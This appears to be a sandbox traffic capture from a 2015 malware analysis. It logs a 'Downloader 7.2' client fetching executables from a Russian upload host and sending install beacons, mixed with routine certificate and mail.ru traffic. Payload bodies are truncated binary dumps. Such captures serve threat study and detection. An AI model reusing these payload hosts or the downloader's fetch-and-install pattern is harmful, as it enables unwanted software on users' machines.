HEAD /?prod=shortcutmaker&version=1.0.0.113&action=set_shortcut_start&guid=BF8501D34E71C08CCE258C678D1C6C1C&mid=BF8501D34E71C08CCE258C678D1C6C1C&os=6.1&bit=64&sig=2f30dcb5fee49f267a17c01eac0c5821&guid=5838C925E41E4C3D96DAEE64DAAFF3A6 HTTP/1.1

Host: gstinfo.ru

Accept: */*


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:34:20 GMT

Content-Type: : text/plain

Content-Length: 3

Connection: keep-alive

GET /msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?8fecbf530911d77c HTTP/1.1

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Thu, 03 Jul 2014 23:34:12 GMT

If-None-Match: "0b2464b1797cf1:0"

User-Agent: Microsoft-CryptoAPI/6.1

Host: ctldl.windowsupdate.com


HTTP/1.1 304 Not Modified

Content-Type: application/octet-stream

Last-Modified: Thu, 03 Jul 2014 23:34:12 GMT

ETag: "0b2464b1797cf1:0"

Cache-Control: max-age=86400

Date: Mon, 23 Feb 2015 09:31:21 GMT

Connection: keep-alive

HTTP/1.1 304 Not Modified..Content-Type: application/octet-stream..Las
t-Modified: Thu, 03 Jul 2014 23:34:12 GMT..ETag: "0b2464b1797cf1:0"..C
ache-Control: max-age=86400..Date: Mon, 23 Feb 2015 09:31:21 GMT..Conn
ection: keep-alive..

GET /update?p=headline&t=loading_goMailRu&v=5038&i=domainLookup0:0,connect:0,request:49,response:58,domComplete:2018,domContentLoaded:841,load:2072&rnd=0.2006721708457917 HTTP/1.1

Host: headline.radar.imgsmail.ru

Connection: keep-alive

Accept: image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Date: Mon, 23 Feb 2015 09:35:35 GMT

Server: imagine/radar (5115861e)

Connection: close

X-Content-Type-Options: nosniff

Content-Length: 43

Content-Type: image/gif

GIF89a.............!.......,...........L..;..

GET /update?rnd=1344337587941&p=gomail3&t=gomail_main&v=0&i=loadcomplete:1958 HTTP/1.1

Host: gomail.radar.imgsmail.ru

Connection: keep-alive

Accept: image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Date: Mon, 23 Feb 2015 09:35:35 GMT

Server: imagine/radar (5115861e)

Connection: close

X-Content-Type-Options: nosniff

Content-Length: 43

Content-Type: image/gif

GIF89a.............!.......,...........L..;..

HEAD /software_install?hetag=bba9e197f9f68f6e3b7c53519e87cb75&guid=140c363d-39d3-4294-82e4-5c1a8eb2cc99&sig=b175ed15447c2776105be181a7b60852&ovr=0&file_id=32888998&did=1497824015&ext_partner_id=&go_search_taskbar=1&ext_partner_id= HTTP/1.1

Host: forces.vseturbo.ru

Accept: */*


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:36:14 GMT

Content-Type: text/html

Connection: close

X-Powered-By: PHP/5.4.37

Expires: Mon, 8 Oct 2012 01:02:03 GMT

Last-Modified: Mon, 23 Feb 2015 09:36:14 GMT

Cache-Control: no-cache, must-revalidate

Pragma: no-cache

GET /p/h/d/0.34.11/external.min.js HTTP/1.1

Host: img.imgsmail.ru

Connection: keep-alive

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:34 GMT

Content-Type: application/x-javascript

Last-Modified: Mon, 16 Feb 2015 08:28:34 GMT

Transfer-Encoding: chunked

Connection: keep-alive

Expires: Mon, 02 Mar 2015 09:35:34 GMT

Cache-Control: max-age=604800

X-Content-Type-Options: nosniff

Content-Encoding: gzip
400a..............yw.I.6..?....#]....F..CO3....=...S...@....`.....DVE.
$/4}o..;g..rU...gDdV.`6.L..a..%.......L{.I.5.....p.......4.v._..im....
.....m....A..i...i'....l\..'.t..F......t6.V.5.3E...2..................
...X.A..6.....t.o..Y5q`&.*...h.!..i;.d..t2..h}.w1M...^KZ.#...fovG..Q6.
6:.,.f....UM...9d.}.#....e6u>Wyl.h...x..is.x..D.>N....Q7k.....~.
?..I...G...%...IX...F.....C....p. .........2i.........=c..w.Iw.q.....)
k{..cv..F8N.[.........k.)..w4Z*N...\..Y . ...3.N.>.j|.d.1...1..5...
......*...r....v..v.iz..'9.{].u4..<<y....T.b..z...).rQ.H.t4L..e.
...T...2.h...g{.b3j!...4......x...Z[]-.]s.}..)...]......j....`.5.?.7@o
~.....k..JZs}.l.zy..n.....^6.d...[..9...}H..T.H.......t..dc..V........
.,A..'....'.^:y.q.b<:....j.V.".t...........'.,.wk..j\.>KZ..>Z
.f..N..:...;<7./.[:......./.....KW....;............e#X../g..DMx...P
 oS......d.t0P.,|.0.W<.../.7.c.D.....t.MX..r..}.FW..N......i..u.u..
G..@.e.0.2.'W%.....&.....i.$,..[m.|...../U.-....(.x....R.......=..>
...HC8...../..C|.9K..0i....7Qr.u..:......g.9=_._./.y..s.....8..R...o..
g9......tjO......nn.;.^..Y3...g.i.`.6.......D.:*............&b.m.i...r
.b8wD...5.........},...kF..,...lN..].c.jk...5.].'.`2(....8.L.n....N...
...f.....L...'.o4.M....`f.t..N...o....X_.....ra.z..$j.....q..`."..8...
...n.Qv...S.Q.s.......^pf.&v..cl...t...".a...@....9z2...H2...q..K..R..
.......vz....u..3N.v...U..m.^..j..5...(K.....L.E..'_...4...q.........`
i.Z{u..!H..?...........6...Ac<Kv.o.D.1QYO...k{. .vd.`F.'.A!........
.\50....q...;.n...4..ut.gni...)AC.%....~P*.l...(..j.F........<\<<< skipped >>>

GET /p/pm/d/0.1.33/blocks/ph-icons/ph-icons.png HTTP/1.1

Host: img.imgsmail.ru

Connection: keep-alive

Accept: image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.imgsmail.ru/static/web/css/main.css?7bf07569

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:34 GMT

Content-Type: image/png

Content-Length: 12255

Last-Modified: Fri, 27 Jun 2014 07:33:46 GMT

Connection: keep-alive

ETag: "53ad1e5a-2fdf"

Expires: Mon, 02 Mar 2015 09:35:34 GMT

Cache-Control: max-age=604800

X-Content-Type-Options: nosniff

Accept-Ranges: bytes
.PNG........IHDR...f.............../.IDATx...i......b.B.5...1.....QNA.
...(........T..........T..E!.Y9..`b6.._......t..............Y#.....lW7
=]...z..4..-9...Oc..d.2.&.%.V.h...h.....|..&.e...C...W.-....j.....G...
........&....1~M...T..5....gPG......qJ.f...l....E.-1....R......*...Tp.
.........I............/.....9.../..y&...i......0....]..&..Yy%.V...Ko..
.c....3..M...che....^..-..dV&...U.t~..L`.....U?dIc.._.3..3.r......w.O.
LU.S...,.80.,&....#8.#..X.\.0.Nr...%.V.H{......O..Y....Vy....!.~=.q..&
lt;.?(.s.w...n.,j...9.ct.{...5...n....[8..-6.9.r.~.......J.S.P.._.].NG
.7.$.:.......3.......1t..&.pX....k.....Z...t..%...}.y..`T. ...e7.@Wzw.
...{P....{..8..]...h^d.(M=..r.N/xb.../x.OzO...\.......~Q.....T..Z<.
n{..................0_.h.....PV.....G;.d.....2...NK.....R.1.A...."e.NF
K.."....K.B.............}...s.;x.;...\....#.W9..k.C.....i.....(}D..'.E
..I..4...y!kw.<.3..tC...g.]x......v...C..,A..t...d....."...A.c.....
.&.......9D..X...@3o.%-......LU.S5.....F.0.&.....,....Kg.....?.y.c..\.
.h..e...z......{..|...t....3.K)c.y..y.):....B#zr/...m..uw.......;.....
..9.#.)fV<-1...f.....f&?..-...fa..&...V.t.-......c..F..y.w.....D..Z
..}..}.i.i.^..3?.>....K....;F......QwL).-...A..%*....._.4(..m..b...
.fy....h. .....Z.1Y...v.....-..Pa4.z,S*a=.B..c..g...V...d......prh2.t.
....t.....\..I.1.S.....e;.B..Fwe...#.y...9...9....Ox....5H.......G&..3
..B6(..P..|.GK,-.T,]Z..y.n......../q...NK(-/q.r.3...'<;.'..X......r
d..3.ea.......]..q..0......Y....[=.fgJ.-.b......V[.r..*.F..qt`........
_...D.....j..t.......H.....$tCP.f....D.?2h.C.....{$\.#.x...4..~...<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEGwkCSV07gf3g5QOsqmf+MY= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.verisign.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1790

content-transfer-encoding: binary

Cache-Control: max-age=487115, public, no-transform, must-revalidate

Last-Modified: Sun, 22 Feb 2015 00:52:54 GMT

Expires: Sun, 1 Mar 2015 00:52:54 GMT

Date: Mon, 23 Feb 2015 09:36:12 GMT

Connection: keep-alive
0..........0..... .....0......0...0........6?s....V....OlL".O..2015022
2005254Z0s0q0I0... ..........!7h....O.d...AG&h.....k.&p..?...-.5......
.l$.%t...............20150222005254Z....20150301005254Z0...*.H........
.....Z....(.D9m..x.B.yx.I.^.../.}..<..<..&*......5..2.;:./..J..&
lt;....S.1"..s...=w.....{$$....q.^..8^-.V.......[SY..%.c6;s.4b..R\....
2....V~..l..=Z...P..........I..#.b..5_..D...e<....J...-.ZH..R,.U..P
F<.j..E[pTqP...N{p}v\.MY..J<P;j......gK...._.\ .....?qed....m'..
..#0...0...0..........<o&S.-S..}...e.30...*.H........0..1.0...U....
US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...
2Terms of use at hXXps://VVV.verisign.com/rpa (c)09100...U...'VeriSign
 Class 3 Code Signing 2009-2 CA0...141205000000Z..150305235959Z0..1.0.
..U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;0
9..U...2Terms of use at hXXps://VVV.verisign.com/rpa (c)091<0:..U..
.3VeriSign Class 3 Code Signing 2009-2 OCSP Responder0.."0...*.H......
.......0.........{(..t....2.Vf.....&;6).i*FK....W@....F....jnb.w._p.E.
6.|.mk....(..........p...........X.DF....^0N....b9.:..J. ZK.".^..\..p.
'.$..JA..~QG.d.}...r...gv... f...z.#..}..J...r9h.........LI-..^.......
PUD.h<.l....(n..i.....E.....2....^./Y......Y.m...'...hz..y..E......
....0...0...U....0.0....U. ...0..0....`.H...E....0..0(.. .........http
s://VVV.verisign.com/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSig
n's CPS incorp. by reference liab. ltd. (c)97 VeriSign0...U.%..0... ..
.....0...U........0... .....0......0"..U....0...0.1.0...U....TGV-B<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD/yl6nWPkczAQUe1tFz6/Oy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS+zcBkvzl4= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.thawte.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1503

content-transfer-encoding: binary

Cache-Control: max-age=505542, public, no-transform, must-revalidate

Last-Modified: Sun, 22 Feb 2015 05:58:10 GMT

Expires: Sun, 1 Mar 2015 05:58:10 GMT

Date: Mon, 23 Feb 2015 09:36:17 GMT

Connection: keep-alive
0..........0..... .....0......0...0......&Km...."....}....,.c..2015022
2055810Z0s0q0I0... ........0..k....&..p..^.X.....{[E....z.1..j..F.WHP.
.G.Mxs..../.p./.^....20150222055810Z....20150301055810Z0...*.H........
.....V.?/...=.k....W...fb..U.........!.*hp.S.[.zB...b....N5.1M.8.I3...
w...v.Fy....M.....u.9ub.0...?.O~K#...s.?..bwG..|).e.P/...6f.0.29....X/
..p...jS.. .As..;.....9...M.P.k...r.. w....C/..s.J.iH.....s....`^..#..
..`s...58q&x\m.....hH.5..7{.M.........|.m1..m.8.q......0...0...0......
......I...*....^n...0...*.H........0..1.0...U....US1.0...U....thawte, 
Inc.1(0&..U....Certification Services Division1806..U.../(c) 2006 thaw
te, Inc. - For authorized use only1.0...U....thawte Primary Root CA0..
.141202000000Z..151216235959Z0_1.0...U....US1.0...U....thawte, Inc.190
7..U...0thawte Primary Root OCSP Responder Certificate 30.."0...*.H...
..........0.........x...F83..,.D.,2D.;JGc.|_.k.....B.7.....G}.M.s.....
S.i.Uu.h.Aq..v...4:l..U.......T7l...~vl...r....{*..........V.o..8|.B..
^.a.. ...z....x..s...\[Y....<....'> ..YC..7.zVk.$...o3..kao]c...
>C./bPX.......I..Oc.....NN......g.....,/..]......qN.....V!<.3.).
..y#.........i0g0...U.%..0... .......0... .....0......0...U.......0.0.
..U...........0!..U....0...0.1.0...U....TGV-B-2770...*.H..............
..lt..\..z. ..N.f.!.S5d?J.&....r...D........L.`.s.p...HC.L.8f... .....
....GA7......P..Z.%.../............z.n.6~I...].).....W...W\|.uya..:...
^...hW..7.Z.uc.'....:.xL...HS.....>.........5......%....3S....h....
....U....o.C.\.t.....G.._.C0(l.E9..6UTxg.gF ..;...<<< skipped >>>

GET /?ap=1&aid=24290099&utm_source=operabrowser&utm_medium=advert&utm_campaign=speed_dial HTTP/1.1

Host: aukro.ua

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Set-Cookie: QXLSESSID=38b13920ac7e344e3b66e4cab7974fd7a7cf2f40846f2f//03; expires=Mon, 23-Feb-2015 15:35:38 GMT; path=/; domain=.aukro.ua

Cache-Control: private

Vary: X-InternalIP, X-Cloud

X-Backend: np_20_dc4_8_133_80

Content-Encoding: gzip

Transfer-Encoding: chunked

Date: Mon, 23 Feb 2015 09:35:38 GMT

Age: 0

Connection: keep-alive

X-Req-Counter: 1

X-Hit: HIT 0

X-Origin: s41470

X-Frame-Options: SAMEORIGIN
00256.............S.N.@......3!..`$;...&*..A* ...'....N...$Z.D....?...
.../..Q..I....,..q.=sf....6 ..ET..vaEIa|l....*..|RPx....y.....!..RAI..
.............@%QX."......S...k .ob..muT..>...n.....M$...O._.JE..U"%
.zMky...*.X..}..Ia.}.r3m.aD......N..>..4....S..#..i....=cv...."...h
_..d.....(.......A0.6.=.!...@3:..O..^......iL,...D....-..[....~.R.....
..P...9.?.x.....Y..._....CR/..t....m.^\..E.&..3...=.9...Z4....L..a:.A 
...j...M...`.r..p.s`y.7....<...i...&....*.&@~(...._...;.;..N0>q.
.~.......4..(.O....rO]?..f.i.1.E.tm.=O........w^...G.oJ.w...G;..Y.{...
yy.^i.[.f...4{w;[~_U.A.h\...,]K.....].......uc.............005.... ...
.0013c8...Zk..6..._A.).\A.&N..2............AV.@..)Q$...I.o....H.L.....
....ht.~......w..F,wJ..P].IV0.K.B..`.._..WW......qX.2.....8.;y.....}..
L.H..q.~.....Q.o.LE...V....bAf..Z.6.x..".....E..i4.wr.....@.6......Y..
.O?.......~.%.......W.i..q...`..X.'..s_.|A..v...l....T.(U..*.....~....
|....<...C..q...qC4(...L....d?7...s/...(nS.t.n..F^....t.......*....
....~a....Hv..>.|.(.....C.....L./....9.5tl/.M..:...O....&.$....:.~.
}....d.C.p..0N.E.K...k....U.Z.`..W4..d.c@.....~L.$...9=.....o..'..y.d.
._i$=.$.X...'[...g.a...VRb..=b.....u...oLi.o.<.@.B...s.k.g..g4..7I.
.#6c..t..1.:....'.$ C.!.....1...M.F.......2...w.P.......al.UzVB...,\..
...l...p.P....U3....... g0=. ........ ... ..$..EV].>648.S.sa.8k.2k.
.]........#k.........2{S.S.....Te.2W.5.v....3. A"7.(.....5.-;O..0.mV3w
a..f..0|.,....].....;H...-...i..4..v.....W.V..Fy.C.S......E0._..?.Y...
y-..B............A....eJ..].v.9.....>:..@..|...[....z.......H`.<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECEGVSJuGyLhjhWQ8phawi51w= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.verisign.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1453

content-transfer-encoding: binary

Cache-Control: max-age=522966, public, no-transform, must-revalidate

Last-Modified: Sun, 22 Feb 2015 10:48:15 GMT

Expires: Sun, 1 Mar 2015 10:48:15 GMT

Date: Mon, 23 Feb 2015 09:36:09 GMT

Connection: keep-alive
0..........0..... .....0......0...0......T3t.%..O.E..~..F.=....2015022
2104815Z0s0q0I0... ........H.dI.....3..^B...d6Q....ZL%."..1.m..._)..a.
.eR&.....Y.)..".\....20150222104815Z....20150301104815Z0...*.H........
......'6}.........^....L.c..WE.}..Q...J..f...t..P.....`F.F%..e....Cm..
...I..$..Ua..k...k.){t:..j55..d..tN8IX..~...S..0......;F.J$.y.....t...
.... ...P.#s....M..........A.K.,.g8.&n.o2PJ.\|DyBq....1.6..,.......&..
.....E.......}....*b.SW.~.;^.@Z#......Q$7....r..I......0...0...0..3...
..../...b.v..-....l}0...*.H........0_1.0...U....US1.0...U....VeriSign,
 Inc.1705..U....Class 3 Public Primary Certification Authority0...1412
02000000Z..151216235959Z0..1.0...U....US1.0...U....Symantec Corporatio
n1.0...U....Symantec Trust Network1?0=..U...6Symantec Class 3 PCA - G1
 OCSP Responder Certificate 30.."0...*.H.............0..........'.....
.Y..x.3B1.7..Q..`..d.. ....s..t.$a.....j2R.{ ,*..c{.3.....H..3-; )....
.0._...*..9M..V...... ...{m...-.......)..tR..{D....~...M...T..pS.p..^|
o....S..v.).).....r.v.qo$......C.V!....@.h#qh...u1T.].G0.]E...=._.....
. ........TE...Sa.s4........r...3.............0..0...U....0.0l..U. .e0
c0a..`.H...E....0R0&.. .........hXXp://VVV.symauth.com/cps0(.. .......
0...hXXp://VVV.symauth.com/rpa0...U.%..0... .......0...U........0... .
....0......0!..U....0...0.1.0...U....TGV-B-2730...*.H.............$..H
......oU....Y!.z{*.V.M..u.._z..3>.. 0....3..m.....e.......a..D.....
......e..F6:.y.....di.......<y.Z.......x}..q.2....UZ1 :,....
<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAxNF3PJUX7iAOhAP2oGxcI= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.verisign.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1790

content-transfer-encoding: binary

Cache-Control: max-age=480944, public, no-transform, must-revalidate

Last-Modified: Sat, 21 Feb 2015 23:08:09 GMT

Expires: Sat, 28 Feb 2015 23:08:09 GMT

Date: Mon, 23 Feb 2015 09:36:09 GMT

Connection: keep-alive
0..........0..... .....0......0...0........6?s....V....OlL".O..2015022
1230809Z0s0q0I0... ..........!7h....O.d...AG&h.....k.&p..?...-.5......
..M.s.Q~...@?j.......20150221230809Z....20150228230809Z0...*.H........
......%.<....M.'M........K(........Q.X7.ycO#...N..t0..H.B$M.A......
....{...!6...k.[4......0...2_.HwbD...M.V.9.....^8.1.. .a.*..f.PXA..";.
.vL.3....K.....p.'l.=A4#..6..n..Bq.;........rA..n.1....f........E.....
...Y......B....e..Z|..d..X.n../.. ....k.a?..U............#0...0...0...
.......<o&S.-S..}...e.30...*.H........0..1.0...U....US1.0...U....Ve
riSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use a
t hXXps://VVV.verisign.com/rpa (c)09100...U...'VeriSign Class 3 Code S
igning 2009-2 CA0...141205000000Z..150305235959Z0..1.0...U....US1.0...
U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms o
f use at hXXps://VVV.verisign.com/rpa (c)091<0:..U...3VeriSign Clas
s 3 Code Signing 2009-2 OCSP Responder0.."0...*.H.............0.......
..{(..t....2.Vf.....&;6).i*FK....W@....F....jnb.w._p.E.6.|.mk....(....
......p...........X.DF....^0N....b9.:..J. ZK.".^..\..p.'.$..JA..~QG.d.
}...r...gv... f...z.#..}..J...r9h.........LI-..^.......PUD.h<.l....
(n..i.....E.....2....^./Y......Y.m...'...hz..y..E..........0...0...U..
..0.0....U. ...0..0....`.H...E....0..0(.. .........hXXps://VVV.verisig
n.com/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's CPS incorp.
 by reference liab. ltd. (c)97 VeriSign0...U.%..0... .......0...U.....
...0... .....0......0"..U....0...0.1.0...U....TGV-B-24710...*.H...<<< skipped >>>

GET /goinf_plugin_cis.exe?etag=bba9e197f9f68f6e3b7c53519e87cb75 HTTP/1.1

User-Agent: Downloader 7.2

Host: illespi.dom-upload.ru

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:24 GMT

Content-Type: application/octet-stream

Content-Length: 1968352

Last-Modified: Tue, 30 Dec 2014 13:08:21 GMT

Connection: keep-alive

ETag: "54a2a3c5-1e08e0"

Accept-Ranges: bytes

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L.....AO
.....................P......'C............@.......................... 
................ ......................................... ...........
x...h.................................................................
...........................text...D........................... .0`.dat
a...............................@.0..rdata...#.......$................
..@.0@.bss..................................0..idata..................
............@.0..ndata...P..........................@.0..rsrc... .....
......................@.0.............................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U..WVS.......U..E....t...F
.........{B..H...H.......M..E..5H{B..D$...$....B..M..E.....SS...E...$.
D$... .B..M..E......M.WW......M.)..M..NT....NP........E.....}...VT....
....FP..E........}..VP........U.......FT.............}..........E..M..
.$..|.B..E..R...D$..E..D$...$....B.....<$....B..E..Q.}.;}...Q....~X
........F4..$....B...W..........$.E......E......D$.........B.RR.FX..$.
D$.....B..5..B.QQ..$.|$...RR...E...$..|....D$. ....D$..D$......D$..{B.
....B...|.......T$...$..QQ.<$....B.S.M..E..D$...$....B.PP1....D

<<< skipped >>>

GET /go_search_taskbar.exe?etag=bba9e197f9f68f6e3b7c53519e87cb75 HTTP/1.1

User-Agent: Downloader 7.2

Host: illespi.dom-upload.ru

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:36:13 GMT

Content-Type: application/octet-stream

Content-Length: 1020384

Last-Modified: Mon, 29 Dec 2014 11:45:12 GMT

Connection: keep-alive

ETag: "54a13ec8-f91e0"

Accept-Ranges: bytes

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........`p.........
....8O..................f....y.......................y.......v........
..............................Rich............................PE..L...
.,.T............................#2....................................
................@..........................@..\..../..................
.....~..........L...P...............................x...@.............
..d............................text............................... ..`
.rdata...F.......H..................@..@.data........P...`...4........
......@....rsrc...............................@..@.reloc..............
................@..B..................................................
......................................................................
......................................................................
......................................................................
............................................U..j.h[...d.....PV..v..3.P
.E.d......u.3.j..N....P.A......A.....Rf...(....U.3.j..N .E.....P.A....
..A.....Rf..........M.d......Y^..]..............U..j.h^...d.....P..(..
v..3..E.SWP.E.d......u..E......>........E.h.Y...^ P.RT...........E.
.9P.r.......9V..F.r...QP......e.j.3..A......A.....hp..........Z..f....
........e..........$9}.r..E.P.`.............9~4r..N Q.H...........3..^
4.F0....f.V 9~.r..F.P."......3..^..F.....f.N..M.d......Y_[.M.3........
]....U..j.h....d.....P...VW..v..3.P.E.d........u..E......~(.}..E..

<<< skipped >>>

GET /jsonp/bar?rnd=1424684154316 HTTP/1.1

Host: bar.love.mail.ru

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Origin: hXXp://go.mail.ru

Accept: */*

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8

Cookie: mrcu=E8FE54EAF466748E05E0E7F48AC1; FTID=31YlJd30my1J:1424684134:631797:::


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:35 GMT

Connection: keep-alive

Content-Length: 2

Access-Control-Allow-Origin: hXXp://go.mail.ru

Access-Control-Allow-Credentials: true

Content-Type: application/javascript; charset=UTF-8
{}HTTP/1.1 200 OK..Server: nginx..Date: Mon, 23 Feb 2015 09:35:35 GMT.
.Connection: keep-alive..Content-Length: 2..Access-Control-Allow-Origi
n: hXXp://go.mail.ru..Access-Control-Allow-Credentials: true..Content-
Type: application/javascript; charset=UTF-8..{}..

GET /cnt/10445?gp=blackbear1 HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Accept-Encoding: gzip, deflate

Host: mail.ru

DNT: 1

Connection: Keep-Alive


HTTP/1.1 302 OK

Server: nginx/1.6.2

Date: Mon, 23 Feb 2015 09:35:31 GMT

Content-Type: text/html

Content-Length: 37

Connection: keep-alive

Set-Cookie: rbcnt=10445; expires=Thu, 26 Feb 2015 09:35:31 GMT; path=/; domain=.mail.ru

Set-Cookie: from_cnt=10445; path=/; domain=.mail.ru

Set-Cookie: from_gp=blackbear1; path=/; domain=.mail.ru

Location: hXXp://mail.ru

Set-Cookie: mrcu=801254EAF463435A4F3CE7F48AC1; expires=Thu, 20 Feb 2025 09:35:31 GMT; path=/; domain=.mail.ru

Cache-Control: no-cache,no-store,must-revalidate

Pragma: no-cache

Expires: Sun, 23 Feb 2014 09:35:31 GMT

Last-Modified: Mon, 23 Feb 2015 12:35:31 GMT

X-XSS-Protection: 1; mode=block; report=hXXps://cspreport.mail.ru/xxssprotection

X-Content-Type-Options: nosniff
<html><body>Redirect...</body></html>HTTP/1.1 
302 OK..Server: nginx/1.6.2..Date: Mon, 23 Feb 2015 09:35:31 GMT..Cont
ent-Type: text/html..Content-Length: 37..Connection: keep-alive..Set-C
ookie: rbcnt=10445; expires=Thu, 26 Feb 2015 09:35:31 GMT; path=/; dom
ain=.mail.ru..Set-Cookie: from_cnt=10445; path=/; domain=.mail.ru..Set
-Cookie: from_gp=blackbear1; path=/; domain=.mail.ru..Location: http:/
/mail.ru..Set-Cookie: mrcu=801254EAF463435A4F3CE7F48AC1; expires=Thu, 
20 Feb 2025 09:35:31 GMT; path=/; domain=.mail.ru..Cache-Control: no-c
ache,no-store,must-revalidate..Pragma: no-cache..Expires: Sun, 23 Feb 
2014 09:35:31 GMT..Last-Modified: Mon, 23 Feb 2015 12:35:31 GMT..X-XSS
-Protection: 1; mode=block; report=hXXps://cspreport.mail.ru/xxssprote
ction..X-Content-Type-Options: nosniff..<html><body>Redire
ct...</body></html>....
<<< skipped >>>

GET / HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Accept-Encoding: gzip, deflate

Host: mail.ru

DNT: 1

Connection: Keep-Alive

Cookie: rbcnt=10445; from_cnt=10445; from_gp=blackbear1; mrcu=801254EAF463435A4F3CE7F48AC1


HTTP/1.1 302 OK

Server: nginx/1.6.2

Date: Mon, 23 Feb 2015 09:35:32 GMT

Content-Type: text/html

Content-Length: 37

Connection: keep-alive

X-Frame-Options: SAMEORIGIN

Location: hXXps://mail.ru

Cache-Control: no-cache,no-store,must-revalidate

Pragma: no-cache

Expires: Sun, 23 Feb 2014 09:35:32 GMT

Last-Modified: Mon, 23 Feb 2015 12:35:32 GMT

X-XSS-Protection: 1; mode=block; report=hXXps://cspreport.mail.ru/xxssprotection

X-Content-Type-Options: nosniff
<html><body>Redirect...</body></html>HTTP/1.1 
302 OK..Server: nginx/1.6.2..Date: Mon, 23 Feb 2015 09:35:32 GMT..Cont
ent-Type: text/html..Content-Length: 37..Connection: keep-alive..X-Fra
me-Options: SAMEORIGIN..Location: hXXps://mail.ru..Cache-Control: no-c
ache,no-store,must-revalidate..Pragma: no-cache..Expires: Sun, 23 Feb 
2014 09:35:32 GMT..Last-Modified: Mon, 23 Feb 2015 12:35:32 GMT..X-XSS
-Protection: 1; mode=block; report=hXXps://cspreport.mail.ru/xxssprote
ction..X-Content-Type-Options: nosniff..<html><body>Redire
ct...</body></html>..

